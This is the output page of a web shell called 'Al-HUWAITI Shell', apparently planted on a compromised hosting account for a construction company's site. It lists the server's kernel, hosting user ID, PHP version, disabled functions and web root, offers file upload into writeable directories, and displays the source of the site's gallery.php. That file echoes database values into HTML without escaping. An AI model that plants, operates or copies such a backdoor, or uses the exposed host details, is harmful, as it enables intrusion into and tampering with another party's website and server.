Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux in-mum-web1333.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64
User : u141265441 ( 141265441)
PHP Version : 8.4.3
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Directory :  /home/u141265441/domains/uniquebuildwell.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u141265441/domains/uniquebuildwell.com/public_html/gallery.php
<?php
@$gallery = 'active';
include("header.php");
include("admin/db.php");
?>

<!-- Breadcrumb area start  -->
<div class="breadcrumb__area breadcrumb-space overly theme-bg-heading-primary overflow-hidden">
    <div class="breadcrumb__background" data-background="./assets/imgs/banner/breadcrumb.jpg"></div>
    <div class="container">
        <div class="row align-items-center justify-content-between">
            <div class="col-12">
                <div class="breadcrumb__content text-center">
                    <h1 class="breadcrumb__title color-white title-animation">Gallery</h1>
                    <div class="breadcrumb__menu d-inline-flex justify-content-center">
                        <nav>
                            <ul>
                                <li>
                                    <span>
                                        <a href="index.php">
                                            <svg width="15" height="16" viewBox="0 0 15 16" fill="none" xmlns="http://www.w3.org/2000/svg">
                                                <path d="M1 5.9L7.5 1L14 5.9V13.6C14 13.9713 13.8478 14.3274 13.5769 14.5899C13.306 14.8525 12.9386 15 12.5556 15H2.44444C2.06135 15 1.69395 14.8525 1.42307 14.5899C1.15218 14.3274 1 13.9713 1 13.6V5.9Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>
                                                <path d="M5.33398 15V8H9.66732V15" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>
                                            </svg>

                                            Home
                                        </a>
                                    </span>
                                </li>
                                <li class="active"><span>Gallery</span></li>
                            </ul>
                        </nav>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<section class="footer-4__area-common section-bg-1 overflow-hidden">
    <div class="container">
        <div class="footer-4__main-wrapper">
            <div class="row mb-minus-50">
                <div class="col-lg-12 col-12">
                    <div class="footer-4__widget footer-4__widget-item-4">
                        <div class="footer-2__widget-gallery">
                            <div class="row g-10">
                                <?php
                                $i = 1;
                                $select_gallery = mysqli_query($con, "select g.*,p.project_name as pname from gallery as g LEFT JOIN project as p ON p.pid=g.pid order by g.gid desc");
                                while ($get_gallery = mysqli_fetch_array($select_gallery)) {
                                    ?>
                                    <div class="col-3" >
                                        <a href="assets/imgs/<?php echo $get_gallery['image'] ?>" class="footer-2__widget-gallery__item popup-image">
                                            <img src="assets/imgs/<?php echo $get_gallery['image'] ?>" alt="" style="height:200px; width:100%">
                                        </a>
										<h2 style="font-size: 18px; text-align: center; line-height: 30px;"><?php echo $get_gallery['pname'] ?></h2>
                                    </div>
                                    <?php
                                }
                                ?>
                                
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<?php
include("footer.php");
?>

Al-HUWAITI Shell